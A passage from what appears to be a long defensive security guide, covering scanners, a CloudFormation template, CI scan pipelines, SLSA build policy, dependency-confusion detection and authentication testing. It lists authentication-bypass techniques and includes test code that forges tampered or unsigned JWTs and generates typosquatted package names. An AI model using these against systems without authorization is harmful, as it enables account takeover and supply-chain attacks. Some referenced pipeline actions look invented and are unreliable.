'MD5', 'SHA1', 'CBC', 'PSK', 'SRP'
]
for cipher in ssl_config.ciphers:
if any(weak in cipher for weak in weak_ciphers):
findings.append({
'severity': 'High',
'type': 'weak_cipher',
'cipher': cipher,
'description': f'Weak cipher suite enabled: {cipher}'
})
# Certificate validation
if not ssl_config.certificate_validation:
findings.append({
'severity': 'High',
'type': 'certificate_validation',
'description': 'Certificate validation disabled'
})
return findingsCloud Security Posture Management (CSPM)
class CSPMScanner:
def __init__(self, cloud_provider):
self.provider = cloud_provider
self.client = self.initialize_client()
self.benchmarks = self.load_benchmarks()
def scan_entire_environment(self):
"""
Comprehensive cloud environment scan
"""
findings = []
# 1. Identity and Access Management
iam_findings = self.scan_iam()
findings.extend(iam_findings)
# 2. Compute Resources
compute_findings = self.scan_compute()
findings.extend(compute_findings)
# 3. Storage Resources
storage_findings = self.scan_storage()
findings.extend(storage_findings)
# 4. Networking
networking_findings = self.scan_networking()
findings.extend(networking_findings)
# 5. Database Services
database_findings = self.scan_databases()
findings.extend(database_findings)
# 6. Logging and Monitoring
logging_findings = self.scan_logging()
findings.extend(logging_findings)
return self.aggregate_findings(findings)
def scan_iam(self):
"""
IAM configuration scanning
"""
findings = []
# Get all IAM policies
policies = self.client.list_policies()
for policy in policies:
# Check for wildcard permissions
if self.has_wildcard_permissions(policy):
findings.append({
'severity': 'High',
'resource': policy['Arn'],
'type': 'wildcard_permissions',
'description': f'IAM policy {policy["PolicyName"]} contains wildcard permissions'
})
# Check for administrative privileges
if self.has_admin_privileges(policy):
findings.append({
'severity': 'High',
'resource': policy['Arn'],
'type': 'admin_privileges',
'description': f'IAM policy {policy["PolicyName"]} grants administrative privileges'
})
# Check for users with console passwords and MFA disabled
users = self.client.list_users()
for user in users:
mfa_devices = self.client.list_mfa_devices(user['UserName'])
# Check for password existence
login_profile = self.client.get_login_profile(user['UserName'])
if login_profile and not mfa_devices:
findings.append({
'severity': 'High',
'resource': user['Arn'],
'type': 'no_mfa',
'description': f'User {user["UserName"]} has console password but no MFA enabled'
})
# Check for unused credentials
credential_report = self.client.generate_credential_report()
for user_report in credential_report:
if user_report['password_last_used'] == 'N/A' and user_report['password_enabled'] == 'true':
days_since_created = (datetime.now() - user_report['user_creation_time']).days
if days_since_created > 90:
findings.append({
'severity': 'Medium',
'resource': user_report['arn'],
'type': 'unused_credentials',
'description': f'User {user_report["user"]} has unused credentials older than 90 days'
})
return findingsSecure Infrastructure as Code Template
# Secure AWS CloudFormation Template
AWSTemplateFormatVersion: '2010-09-09'
Description: 'Secure Infrastructure Template with embedded security controls'
Metadata:
SecurityControls:
- NIST-800-53: AC-3
- NIST-800-53: AC-6
- NIST-800-53: SC-7
- NIST-800-53: SC-28
Parameters:
Environment:
Type: String
AllowedValues: [dev, staging, prod]
Default: dev
AllowedIPRange:
Type: String
Default: 10.0.0.0/8
Description: 'Allowed IP range for administrative access'
Resources:
# Secure VPC with isolated subnets
VPC:
Type: AWS::EC2::VPC
Properties:
CidrBlock: 10.0.0.0/16
EnableDnsHostnames: true
EnableDnsSupport: true
Tags:
- Key: Environment
Value: !Ref Environment
# Private subnets for sensitive resources
PrivateSubnet1:
Type: AWS::EC2::Subnet
Properties:
VpcId: !Ref VPC
CidrBlock: 10.0.1.0/24
AvailabilityZone: !Select [0, !GetAZs '']
Tags:
- Key: Network
Value: Private
# Security Group with least privilege
AppSecurityGroup:
Type: AWS::EC2::SecurityGroup
Properties:
GroupDescription: 'Application security group with least privilege'
VpcId: !Ref VPC
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: 443
ToPort: 443
CidrIp: 0.0.0.0/0
Description: 'HTTPS from anywhere'
- IpProtocol: tcp
FromPort: 22
ToPort: 22
CidrIp: !Ref AllowedIPRange
Description: 'SSH from admin network only'
SecurityGroupEgress:
- IpProtocol: -1
CidrIp: 0.0.0.0/0
Description: 'Allow all outbound'
# IAM Role with least privilege
AppRole:
Type: AWS::IAM::Role
Properties:
AssumeRolePolicyDocument:
Version: '2012-10-17'
Statement:
- Effect: Allow
Principal:
Service: ec2.amazonaws.com
Action: sts:AssumeRole
Policies:
- PolicyName: AppPolicy
PolicyDocument:
Version: '2012-10-17'
Statement:
- Sid: 'AllowS3ReadOnly'
Effect: Allow
Action:
- s3:GetObject
- s3:ListBucket
Resource:
- !Sub 'arn:aws:s3:::${AppBucket}'
- !Sub 'arn:aws:s3:::${AppBucket}/*'
- Sid: 'AllowCloudWatchLogs'
Effect: Allow
Action:
- logs:CreateLogGroup
- logs:CreateLogStream
- logs:PutLogEvents
Resource: '*'
ManagedPolicyArns:
- arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
# Encrypted S3 Bucket
AppBucket:
Type: AWS::S3::Bucket
Properties:
BucketEncryption:
ServerSideEncryptionConfiguration:
- ServerSideEncryptionByDefault:
SSEAlgorithm: AES256
PublicAccessBlockConfiguration:
BlockPublicAcls: true
BlockPublicPolicy: true
IgnorePublicAcls: true
RestrictPublicBuckets: true
VersioningConfiguration:
Status: Enabled
LoggingConfiguration:
DestinationBucketName: !Ref LogBucket
LogFilePrefix: 'app-access-logs/'
# S3 Bucket Policy
AppBucketPolicy:
Type: AWS::S3::BucketPolicy
Properties:
Bucket: !Ref AppBucket
PolicyDocument:
Version: '2012-10-17'
Statement:
- Sid: 'DenyNonSSLRequests'
Effect: Deny
Principal: '*'
Action: 's3:*'
Resource:
- !Sub '${AppBucket.Arn}'
- !Sub '${AppBucket.Arn}/*'
Condition:
Bool:
'aws:SecureTransport': false
# CloudTrail for auditing
CloudTrail:
Type: AWS::CloudTrail::Trail
Properties:
IsLogging: true
S3BucketName: !Ref LogBucket
EventSelectors:
- IncludeManagementEvents: true
ReadWriteType: All
IsMultiRegionTrail: true
EnableLogFileValidation: true
KMSKeyId: !Ref TrailKMSKey
# KMS Key for encryption
TrailKMSKey:
Type: AWS::KMS::Key
Properties:
Description: 'KMS key for CloudTrail encryption'
EnableKeyRotation: true
KeyPolicy:
Version: '2012-10-17'
Id: key-consolepolicy-3
Statement:
- Sid: 'Enable IAM User Permissions'
Effect: Allow
Principal:
AWS: !Sub 'arn:aws:iam::${AWS::AccountId}:root'
Action: 'kms:*'
Resource: '*'
- Sid: 'Allow CloudTrail to encrypt logs'
Effect: Allow
Principal:
Service: cloudtrail.amazonaws.com
Action:
- kms:GenerateDataKey*
- kms:DescribeKey
Resource: '*'
Condition:
StringLike:
'kms:EncryptionContext:aws:cloudtrail:arn':
!Sub 'arn:aws:cloudtrail:*:${AWS::AccountId}:trail/*'
Outputs:
VPCId:
Description: 'VPC ID'
Value: !Ref VPC
AppSecurityGroupId:
Description: 'Application Security Group ID'
Value: !Ref AppSecurityGroup
AppRoleArn:
Description: 'Application IAM Role ARN'
Value: !GetAtt AppRole.ArnGitOps Security Pipeline
# .github/workflows/security-scan.yml
name: Security Scanning Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
jobs:
infrastructure-security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Terraform Security Scan
uses: bridgecrewio/checkov-action@master
with:
directory: terraform/
soft_fail: false
framework: terraform
quiet: true
- name: Kubernetes Manifest Security
uses: stackrox/kube-linter-action@v1
with:
path: kubernetes/
config: .kube-linter.yaml
- name: Dockerfile Security
uses: aquasecurity/trivy-action@master
with:
scan-type: 'config'
scan-ref: 'Dockerfile'
application-security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: SAST Scanning
uses: github/codeql-action/init@v1
with:
languages: javascript, python, java
- name: Dependency Scanning
uses: snyk/actions/node@master
env:
SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
with:
args: --severity-threshold=high
- name: Secret Scanning
uses: gitleaks/gitleaks-action@master
env:
GITLEAKS_CONFIG: .gitleaks.toml
compliance-validation:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: CIS Benchmark Compliance
uses: aws-actions/aws-cloudformation-cis-benchmark@v1
with:
stack-name: production-stack
- name: NIST Compliance Check
uses: nist-800-53/compliance-check@v1
with:
framework: nist-800-53-rev5
deployment-security:
runs-on: ubuntu-latest
needs: [infrastructure-security, application-security, compliance-validation]
if: success()
steps:
- name: Security Gate Approval
uses: 1password/load-secrets-action@v1
with:
export-env: true
env:
OP_SERVICE_ACCOUNT_TOKEN: ${{ secrets.OP_SERVICE_ACCOUNT_TOKEN }}
OP_SECRET_REFERENCE_APPROVAL: 'vaults/security/items/approval-token'
- name: Deploy with Security Context
run: |
kubectl apply -f kubernetes/ --context=security-auditedSoftware Bill of Materials (SBOM) Analysis SBOMs provide machine-readable inventory of software components. Key standards:
- SPDX (Software Package Data Exchange): ISO/IEC 5962:2021 standard
- CycloneDX: OWASP standard for software composition analysis
- SWID (Software Identification): ISO/IEC 19770-2:2015
Dependency Graph Attack Vectors
graph TD
A[Main Application] --> B[Direct Dependency v1.2.0]
B --> C[Transitive Dependency v0.8.3]
C --> D[Vulnerable Library v2.1.0]
D --> E[CVE-2023-1234: RCE]
F[Malicious Package] --> G[Typosquatting: 'requrests']
G --> H[Direct Dependency Compromise]
I[Build System] --> J[Compromised Plugin]
J --> K[Backdoored Artifacts]
L[Package Registry] --> M[Hijacked Maintainer Account]
M --> N[Malicious Version Published]
Software Composition Analysis Framework
class AdvancedSCA:
def __init__(self):
self.vulnerability_dbs = {
'nvd': NVDDatabase(),
'osv': OSVDatabase(),
'ghsa': GitHubAdvisoryDatabase(),
'snyk': SnykDatabase()
}
self.sbom_generators = {
'spdx': SPDXGenerator(),
'cyclonedx': CycloneDXGenerator(),
'swid': SWIDGenerator()
}
self.behavioral_scanners = {
'network': NetworkBehaviorScanner(),
'filesystem': FilesystemBehaviorScanner(),
'process': ProcessBehaviorScanner()
}
def comprehensive_scan(self, project_path):
"""
Multi-dimensional supply chain security scan
"""
results = {
'inventory': None,
'vulnerabilities': [],
'licenses': [],
'behavioral_analysis': {},
'provenance': {}
}
# Step 1: Generate comprehensive SBOM
results['inventory'] = self.generate_sbom(project_path)
# Step 2: Vulnerability correlation
results['vulnerabilities'] = self.analyze_vulnerabilities(
results['inventory']
)
# Step 3: License compliance check
results['licenses'] = self.check_licenses(results['inventory'])
# Step 4: Behavioral analysis
results['behavioral_analysis'] = self.perform_behavioral_analysis(
project_path
)
# Step 5: Provenance verification
results['provenance'] = self.verify_provenance(project_path)
# Step 6: Risk scoring
results['risk_score'] = self.calculate_risk_score(results)
return results
def generate_sbom(self, project_path):
"""
Generate comprehensive software bill of materials
"""
sbom = {
'metadata': {
'timestamp': datetime.now().isoformat(),
'tool': 'AdvancedSCA v1.0',
'project': os.path.basename(project_path)
},
'components': [],
'dependencies': [],
'relationships': []
}
# Detect package managers and parse manifests
package_managers = self.detect_package_managers(project_path)
for pm in package_managers:
components = pm.parse_manifest(project_path)
sbom['components'].extend(components)
# Build dependency graph
dependency_graph = pm.build_dependency_graph(components)
sbom['dependencies'].extend(dependency_graph)
# Extract relationship information
relationships = pm.extract_relationships(components)
sbom['relationships'].extend(relationships)
# Add runtime dependencies
runtime_deps = self.analyze_runtime_dependencies(project_path)
sbom['components'].extend(runtime_deps)
# Add transitive dependencies
transitive_deps = self.resolve_transitive_dependencies(
sbom['dependencies']
)
sbom['components'].extend(transitive_deps)
return sbom
def analyze_vulnerabilities(self, sbom):
"""
Correlate components with vulnerability databases
"""
vulnerabilities = []
for component in sbom['components']:
# Query multiple vulnerability databases
component_vulns = []
for db_name, db in self.vulnerability_dbs.items():
vulns = db.query(
name=component['name'],
version=component['version'],
ecosystem=component['ecosystem']
)
# Enrich vulnerability data
enriched_vulns = self.enrich_vulnerability_data(vulns)
component_vulns.extend(enriched_vulns)
# Deduplicate and prioritize
unique_vulns = self.deduplicate_vulnerabilities(component_vulns)
prioritized_vulns = self.prioritize_vulnerabilities(unique_vulns)
vulnerabilities.append({
'component': component,
'vulnerabilities': prioritized_vulns
})
return vulnerabilities
def perform_behavioral_analysis(self, project_path):
"""
Behavioral analysis of dependencies
"""
behaviors = {
'network': [],
'filesystem': [],
'process': [],
'memory': []
}
# Create isolated sandbox
sandbox = self.create_sandbox()
# Install and execute in sandbox
sandbox.install_dependencies(project_path)
sandbox.execute_application()
# Monitor behaviors
behaviors['network'] = self.behavioral_scanners['network'].monitor(
sandbox
)
behaviors['filesystem'] = self.behavioral_scanners['filesystem'].monitor(
sandbox
)
behaviors['process'] = self.behavioral_scanners['process'].monitor(
sandbox
)
# Analyze behavioral patterns
suspicious_behaviors = self.detect_suspicious_patterns(behaviors)
return {
'raw_behaviors': behaviors,
'suspicious': suspicious_behaviors,
'risk_level': self.calculate_behavioral_risk(suspicious_behaviors)
}Dependency Confusion Detection
class DependencyConfusionDetector:
def __init__(self):
self.public_registries = [
'https://registry.npmjs.org',
'https://pypi.org',
'https://repo.maven.apache.org/maven2',
'https://nuget.org'
]
self.internal_registries = []
self.typosquatting_patterns = self.load_typosquatting_patterns()
def detect_confusion(self, package_manifest):
"""
Detect dependency confusion vulnerabilities
"""
findings = []
# Get all dependencies
dependencies = self.extract_dependencies(package_manifest)
for dep in dependencies:
# Check if dependency could be confused
if self.is_confusion_candidate(dep):
# Check public registries
public_versions = self.check_public_registry(dep)
if public_versions:
# Confusion possible
findings.append({
'dependency': dep,
'type': 'dependency_confusion',
'public_versions': public_versions,
'risk': 'High',
'description': f'Dependency {dep["name"]} exists in public registry'
})
# Check for typosquatting
typosquatting_candidates = self.find_typosquatting_candidates(
dep['name']
)
for candidate in typosquatting_candidates:
if self.check_public_registry({'name': candidate}):
findings.append({
'dependency': dep,
'type': 'typosquatting',
'malicious_package': candidate,
'risk': 'Critical',
'description': f'Typosquatting candidate {candidate} exists'
})
return findings
def is_confusion_candidate(self, dependency):
"""
Determine if a dependency is a confusion candidate
"""
# Criteria for confusion candidates:
# 1. Common package names
# 2. No namespace/scoped package
# 3. Simple names that could exist publicly
name = dependency['name']
# Check if it's scoped (@org/package)
if '/' in name or name.startswith('@'):
return False
# Check if it's a common dictionary word
if self.is_common_word(name):
return True
# Check if similar names exist in public registries
similar_count = self.count_similar_public_packages(name)
return similar_count > 0
def find_typosquatting_candidates(self, package_name):
"""
Generate potential typosquatting candidates
"""
candidates = []
# Common typosquatting techniques
techniques = [
# Character omission
lambda s: [s[:i] + s[i+1:] for i in range(len(s))],
# Character duplication
lambda s: [s[:i] + s[i] + s[i:] for i in range(len(s))],
# Character substitution
lambda s: [
s[:i] + c + s[i+1:]
for i in range(len(s))
for c in 'abcdefghijklmnopqrstuvwxyz'
if c != s[i]
],
# Character transposition
lambda s: [
s[:i] + s[i+1] + s[i] + s[i+2:]
for i in range(len(s)-1)
],
# Homoglyph substitution
lambda s: self.apply_homoglyphs(s),
# Addition of separators
lambda s: [s[:i] + '-' + s[i:] for i in range(1, len(s))],
]
for technique in techniques:
candidates.extend(technique(package_name))
# Remove duplicates and original
candidates = list(set(candidates))
if package_name in candidates:
candidates.remove(package_name)
return candidates[:50] # Limit to top 50 candidatesSecure Software Factory Pattern
class SecureSoftwareFactory:
def __init__(self):
self.sbom_manager = SBOMManager()
self.artifact_signing = ArtifactSigning()
self.provenance_tracker = ProvenanceTracker()
self.verification_pipeline = VerificationPipeline()
def build_secure_artifact(self, source_code):
"""
End-to-end secure build process
"""
# Phase 1: Source Verification
source_verification = self.verify_source(source_code)
if not source_verification.valid:
raise BuildError("Source verification failed")
# Phase 2: Dependency Resolution with Verification
dependencies = self.resolve_dependencies(source_code)
verified_deps = self.verify_dependencies(dependencies)
# Phase 3: Secure Build Environment
build_env = self.create_secure_build_environment()
# Phase 4: Build with Integrity
artifact = self.build_artifact(
source_code,
verified_deps,
build_env
)
# Phase 5: Generate Provenance
provenance = self.generate_provenance(
source_code,
dependencies,
build_env,
artifact
)
# Phase 6: Sign Artifact
signed_artifact = self.sign_artifact(artifact, provenance)
# Phase 7: Store in Secure Registry
self.store_in_registry(signed_artifact)
return {
'artifact': signed_artifact,
'provenance': provenance,
'sbom': self.sbom_manager.generate(artifact),
'verification_report': self.generate_verification_report()
}
def verify_dependencies(self, dependencies):
"""
Multi-layered dependency verification
"""
verified_deps = []
for dep in dependencies:
# Layer 1: Signature verification
if not self.verify_signature(dep):
raise SecurityError(f"Invalid signature for {dep['name']}")
# Layer 2: Hash verification
if not self.verify_hash(dep):
raise SecurityError(f"Hash mismatch for {dep['name']}")
# Layer 3: SBOM verification
dep_sbom = self.sbom_manager.retrieve(dep)
if not self.verify_sbom(dep_sbom):
raise SecurityError(f"SBOM verification failed for {dep['name']}")
# Layer 4: Vulnerability check
vulns = self.check_vulnerabilities(dep_sbom)
if vulns['critical'] > 0:
raise SecurityError(
f"Critical vulnerabilities in {dep['name']}"
)
# Layer 5: License compliance
if not self.check_license_compliance(dep_sbom):
raise SecurityError(
f"License violation for {dep['name']}"
)
verified_deps.append({
**dep,
'verification': {
'signature': 'valid',
'hash': 'valid',
'sbom': 'valid',
'vulnerabilities': vulns,
'license': 'compliant'
}
})
return verified_deps
def generate_provenance(self, source, dependencies, environment, artifact):
"""
Generate comprehensive build provenance
"""
provenance = {
'metadata': {
'build_id': str(uuid.uuid4()),
'timestamp': datetime.now().isoformat(),
'builder': environment['builder'],
'build_command': environment['command']
},
'source': {
'uri': source['uri'],
'digest': source['digest'],
'commit': source['commit'],
'signature': source['signature']
},
'dependencies': [
{
'name': dep['name'],
'version': dep['version'],
'digest': dep['digest'],
'uri': dep['uri'],
'verification': dep['verification']
}
for dep in dependencies
],
'environment': {
'builder_image': environment['builder_image'],
'build_parameters': environment['parameters'],
'isolation': environment['isolation'],
'resource_limits': environment['limits']
},
'artifact': {
'digest': artifact['digest'],
'materials': [
source['digest'],
*[dep['digest'] for dep in dependencies]
],
'byproducts': {
'logs': artifact['logs'],
'metrics': artifact['metrics']
}
},
'signatures': {
'source_signature': source['signature'],
'builder_signature': environment['signature'],
'artifact_signature': artifact['signature']
}
}
# Generate SLSA provenance
provenance['slsa'] = self.generate_slsa_provenance(provenance)
return provenanceSoftware Supply Chain Security Platform
# slsa-build.yml - SLSA Level 3 Build Definition
apiVersion: slsa.dev/v1alpha1
kind: BuildDefinition
metadata:
name: secure-application-build
namespace: production
spec:
# Source Requirements
source:
uri: https://github.com/company/application
digest:
sha256: abc123...
signed: true
requireBranch: main
requireTag: v*
# Build Environment
buildType: container
externalParameters:
buildConfig:
steps:
- name: checkout
args: [clone, --depth=1, {{.source.uri}}]
- name: verify-signature
args: [verify, {{.source.digest}}]
- name: resolve-dependencies
args: [install, --frozen-lockfile]
- name: run-tests
args: [test, --coverage]
- name: build-artifact
args: [build, --prod]
# Dependency Requirements
dependencies:
- name: node
version: "18.x"
digest:
sha256: def456...
- name: npm-dependencies
lockfile: package-lock.json
verifySignature: true
- name: build-environment
image: company/build-container:v1.2.3
digest:
sha256: ghi789...
# Build System Requirements
system:
isolated: true
ephemeral: true
hermetic: true
reproducible: true
# Attestation Requirements
attestations:
- predicateType: https://slsa.dev/provenance/v0.2
required: true
- predicateType: https://slsa.dev/vulnerability-scan/v0.1
required: true
- predicateType: https://slsa.dev/license-compliance/v0.1
required: true
# Verification Policies
verification:
- policy: source-verification
enforcement: required
parameters:
minSignatures: 2
trustedKeys:
- key1
- key2
- policy: vulnerability-scan
enforcement: required
parameters:
maxCritical: 0
maxHigh: 3
failOnUnknown: true
- policy: license-compliance
enforcement: required
parameters:
allowed:
- MIT
- Apache-2.0
denied:
- GPL-3.0
- policy: dependency-verification
enforcement: required
parameters:
requireSBOM: true
requireProvenance: true
requireSignature: trueAuthentication Bypass Techniques Evolution
-
JWT Attacks
- Algorithm Confusion: RS256 → HS256
- Key Injection:
kidheader manipulation - Claim Tampering: Role escalation in claims
- Signature Stripping: Removing signature validation
-
OAuth/OIDC Misconfigurations
- Open Redirector:
redirect_urivalidation bypass - PKCE Bypass: Missing or weak code verifier
- ID Token Replay: Missing nonce validation
- Token Mix-Up: Confusion between tokens
- Open Redirector:
-
Passwordless Authentication Risks
- Magic Link Enumeration: Predictable URL patterns
- Biometric Spoofing: Fake fingerprints/face recognition
- FIDO2/WebAuthn: Lost authenticator attacks
Authentication Flow Security Testing
class AuthenticationSecurityTester:
def __init__(self, target_application):
self.target = target_application
self.auth_flows = self.analyze_auth_flows()
self.test_cases = self.generate_test_cases()
def analyze_auth_flows(self):
"""
Reverse engineer authentication flows
"""
flows = {
'registration': self.analyze_registration_flow(),
'login': self.analyze_login_flow(),
'password_reset': self.analyze_password_reset_flow(),
'mfa': self.analyze_mfa_flow(),
'sessions': self.analyze_session_management(),
'oauth': self.analyze_oauth_flow()
}
return flows
def generate_test_cases(self):
"""
Generate comprehensive authentication test cases
"""
test_cases = []
# Registration flow tests
test_cases.extend(self.test_registration_flow())
# Login flow tests
test_cases.extend(self.test_login_flow())
# Password reset tests
test_cases.extend(self.test_password_reset())
# MFA tests
test_cases.extend(self.test_mfa())
# Session management tests
test_cases.extend(self.test_session_management())
# OAuth tests
test_cases.extend(self.test_oauth())
return test_cases
def test_login_flow(self):
"""
Login flow security tests
"""
tests = []
# Test 1: Credential enumeration
tests.extend(self.test_credential_enumeration())
# Test 2: Account lockout bypass
tests.extend(self.test_account_lockout_bypass())
# Test 3: Response timing analysis
tests.extend(self.test_response_timing())
# Test 4: SQL injection in login
tests.extend(self.test_login_injection())
# Test 5: JWT attacks
tests.extend(self.test_jwt_attacks())
# Test 6: Session fixation
tests.extend(self.test_session_fixation())
return tests
def test_credential_enumeration(self):
"""
Test for username/password enumeration
"""
tests = []
# Different response for valid vs invalid username
valid_user_response = self.target.login(
username="known_user",
password="wrong_password"
)
invalid_user_response = self.target.login(
username="unknown_user",
password="wrong_password"
)
if self.detect_enumeration_vulnerability(
valid_user_response,
invalid_user_response
):
tests.append({
'type': 'credential_enumeration',
'severity': 'Medium',
'description': 'Different responses for valid/invalid users',
'recommendation': 'Standardize error messages'
})
# Rate limiting effectiveness test
for i in range(100):
response = self.target.login(
username=f"test_user_{i}",
password="wrong_password"
)
if response.status_code != 429 and i > 10:
tests.append({
'type': 'rate_limit_bypass',
'severity': 'High',
'description': 'No rate limiting on login attempts',
'recommendation': 'Implement rate limiting'
})
break
return tests
def test_jwt_attacks(self):
"""
Test JWT implementation vulnerabilities
"""
tests = []
# Get a valid JWT
valid_jwt = self.get_valid_jwt()
# Test 1: Algorithm confusion
confused_jwt = self.create_algorithm_confusion_jwt(valid_jwt)
if self.target.accepts_jwt(confused_jwt):
tests.append({
'type': 'jwt_algorithm_confusion',
'severity': 'Critical',
'description': 'JWT algorithm confusion vulnerability',
'recommendation': 'Explicitly verify algorithm'
})
# Test 2: Signature stripping
stripped_jwt = self.strip_signature(valid_jwt)
if self.target.accepts_jwt(stripped_jwt):
tests.append({
'type': 'jwt_signature_stripping',
'severity': 'Critical',
'description': 'JWT accepted without signature',
'recommendation': 'Require signature validation'
})
# Test 3: Claim tampering
tampered_jwt = self.tamper_claims(valid_jwt, {'role': 'admin'})
if self.target.accepts_jwt(tampered_jwt):
tests.append({
'type': 'jwt_claim_tampering',
'severity': 'High',
'description': 'JWT claims can be tampered',
'recommendation': 'Validate claim signatures'
})
# Test 4: Expired token acceptance
expired_jwt = self.create_expired_jwt()
if self.target.accepts_jwt(expired_jwt):
tests.append({
'type': 'jwt_expiry_bypass',
'severity': 'High',
'description': 'Expired JWT tokens accepted',
'recommendation': 'Validate token expiration'
})
return testsPassword Security Analysis Framework
class PasswordSecurityAnalyzer:
def __init__(self):
self.breached_passwords = self.load_breach_database()
self.common_passwords = self.load_common_passwords()
self.password_rules = self.load_password_rules()
def analyze_password_policy(self, policy):
"""
Analyze password policy effectiveness
"""
analysis = {
'strength': 0,
'vulnerabilities': [],
'recommendations': []
}
# Check minimum length
if policy.min_length < 12:
analysis['vulnerabilities'].append({
'type': 'short_minimum_length',
'severity': 'High',
'description': f'Minimum length {policy.min_length} is too short',
'recommendation': 'Increase minimum length to 12 characters'
})
# Check character requirements
if not policy.require_uppercase:
analysis['vulnerabilities'].append({
'type': 'missing_uppercase_requirement',
'severity': 'Medium',
'description': 'No uppercase character requirement',
'recommendation': 'Require at least one uppercase letter'
})
if not policy.require_lowercase:
analysis['vulnerabilities'].append({
'type': 'missing_lowercase_requirement',
'severity': 'Medium',
'description': 'No lowercase character requirement',
'recommendation': 'Require at least one lowercase letter'
})
if not policy.require_numbers:
analysis['vulnerabilities'].append({
'type': 'missing_number_requirement',
'severity': 'Medium',
'description': 'No number requirement',
'recommendation': 'Require at least one number'
})
if not policy.require_special:
analysis['vulnerabilities'].append({
'type': 'missing_special_requirement',
'severity': 'Medium',
'description': 'No special character requirement',
'recommendation': 'Require at least one special character'
})
# Check maximum age
if not policy.max_age_days or policy.max_age_days > 90:
analysis['vulnerabilities'].append({
'type': 'long_password_age',
'severity': 'Medium',
'description': f'Password age {policy.max_age_days} days is too long',
'recommendation': 'Set maximum password age to 90 days'
})
# Check password history
if not policy.history_size or policy.history_size < 5:
analysis['vulnerabilities'].append({
'type': 'insufficient_password_history',
'severity': 'Medium',
'description': f'Password history size {policy.history_size} is insufficient',
'recommendation': 'Maintain at least 5 previous passwords'
})
# Check for common password prevention
if not policy.prevent_common_passwords:
analysis['vulnerabilities'].append({
'type': 'common_passwords_allowed',
'severity': 'High',
'description': 'Common passwords are not prevented',
'recommendation': 'Implement common password checking'
})
# Calculate overall strength score
analysis['strength'] = self.calculate_policy_strength(policy)
return analysis
def test_password_strength(self, passwords):
"""
Test actual password strength
"""
results = []
for password in passwords:
# Skip empty passwords
if not password:
continue
strength = self.calculate_password_strength(password)
entropy = self.calculate_entropy(password)
# Check against breach database
is_breached = password in self.breached_passwords
# Check against common passwords
is_common = password in self.common_passwords
# Check for patterns
patterns = self.detect_patterns(password)
results.append({
'password': '***' + password[-3:] if len(password) > 3 else '***',
'length': len(password),
'strength': strength,
'entropy': entropy,
'is_breached': is_breached,
'is_common': is_common,
'patterns': patterns,
'recommendations': self.generate_recommendations(
password, strength, is_breached, is_common, patterns
)
})
return results
def calculate_password_strength(self, password):
"""
Calculate comprehensive password strength
"""
score = 0
# Length score
if len(password) >= 8:
score += 1
if len(password) >= 12:
score += 2
if len(password) >= 16:
score += 3
if len(password) >= 20:
score += 4
# Character variety score
char_categories = 0
if re.search(r'[A-Z]', password):
char_categories += 1
if re.search(r'[a-z]', password):
char_categories += 1
if re.search(r'\d', password):
char_categories += 1
if re.search(r'[^A-Za-z0-9]', password):
char_categories += 1
score += char_categories
# Entropy bonus
entropy = self.calculate_entropy(password)
if entropy > 80:
score += 3
elif entropy > 60:
score += 2
elif entropy > 40:
score += 1
# Pattern penalty
patterns = self.detect_patterns(password)
score -= len(patterns) * 2
# Common password penalty
if password in self.common_passwords:
score -= 10
# Breached password penalty
if password in self.breached_passwords:
score -= 20
# Normalize to 0-100 scale
normalized_score = max(0, min(100, (score / 15) * 100))
return normalized_scoreZero-Trust Authentication System
class ZeroTrustAuthentication:
def __init__(self):
self.context_collector = ContextCollector()
self.risk_engine = RiskEngine()
self.policy_engine = PolicyEngine()
self.adaptive_auth = AdaptiveAuthenticator()
def authenticate(self, request):
"""
Zero-trust authentication with continuous evaluation
"""
# Step 1: Collect context
context = self.context_collector.collect(request)
# Step 2: Initial authentication
auth_result = self.initial_authentication(request)
if not auth_result.success:
return AuthenticationResponse(
success=False,
reason=auth_result.reason
)
# Step 3: Calculate risk score
risk_score = self.risk_engine.calculate(
auth_result,
context
)
# Step 4: Apply policies
policy_result = self.policy_engine.evaluate(
auth_result.user,
context,
risk_score
)
# Step 5: Adaptive authentication
if risk_score > policy_result.threshold:
# Step-up authentication required
step_up_result = self.adaptive_auth.step_up(
auth_result.user,
context,
risk_score
)
if not step_up_result.success:
return AuthenticationResponse(
success=False,
reason='Step-up authentication failed'
)
# Step 6: Generate continuous authentication token
cat = self.generate_continuous_auth_token(
auth_result.user,
context,
risk_score
)
# Step 7: Return authentication result with CAT
return AuthenticationResponse(
success=True,
user=auth_result.user,
session_token=self.generate_session_token(),
continuous_auth_token=cat,
risk_score=risk_score,
policies_applied=policy_result.applied_policies
)
def continuous_evaluation(self, session_token, request):
"""
Continuously evaluate authentication context
"""
# Step 1: Validate session
session = self.validate_session(session_token)
if not session.valid:
return EvaluationResult(invalid_session=True)
# Step 2: Collect current context
context = self.context_collector.collect(request)
# Step 3: Check for anomalies
anomalies = self.detect_anomalies(session, context)
if anomalies:
# Step 4: Recalculate risk
risk_score = self.risk_engine.recalculate(
session,
context,
anomalies
)
# Step 5: Apply adaptive controls
if risk_score > session.risk_threshold:
# Trigger step-up or session termination
return self.handle_risk_escalation(
session,
context,
risk_score,
anomalies
)
return EvaluationResult(
valid=True,
risk_score=session.risk_score,
anomalies=anomalies
)
def detect_anomalies(self, session, context):
"""
Detect authentication anomalies
"""
anomalies = []
# Geographic anomalies
if session.location and context.location:
distance = self.calculate_distance(
session.location,
context.location
)
# Check if physically possible
time_diff = context.timestamp - session.last_activity
max_speed = 1000 # km/h (accounting for air travel)
max_distance = (time_diff.total_seconds() / 3600) * max_speed
if distance > max_distance:
anomalies.append({
'type': 'geographic_impossibility',
'distance_km': distance,
'max_possible_km': max_distance
})
# Device fingerprint anomalies
if session.device_fingerprint != context.device_fingerprint:
similarity = self.calculate_fingerprint_similarity(
session.device_fingerprint,
context.device_fingerprint
)
if similarity < 0.8: # 80% similarity threshold
anomalies.append({
'type': 'device_fingerprint_change',
'similarity': similarity
})
# Behavioral anomalies
behavior_profile = session.behavior_profile
current_behavior = self.extract_behavior(context)
behavior_deviation = self.calculate_behavior_deviation(
behavior_profile,
current_behavior
)
if behavior_deviation > 2.0: # 2 standard deviations
anomalies.append({
'type': 'behavioral_anomaly',
'deviation': behavior_deviation
})
# Time-based anomalies
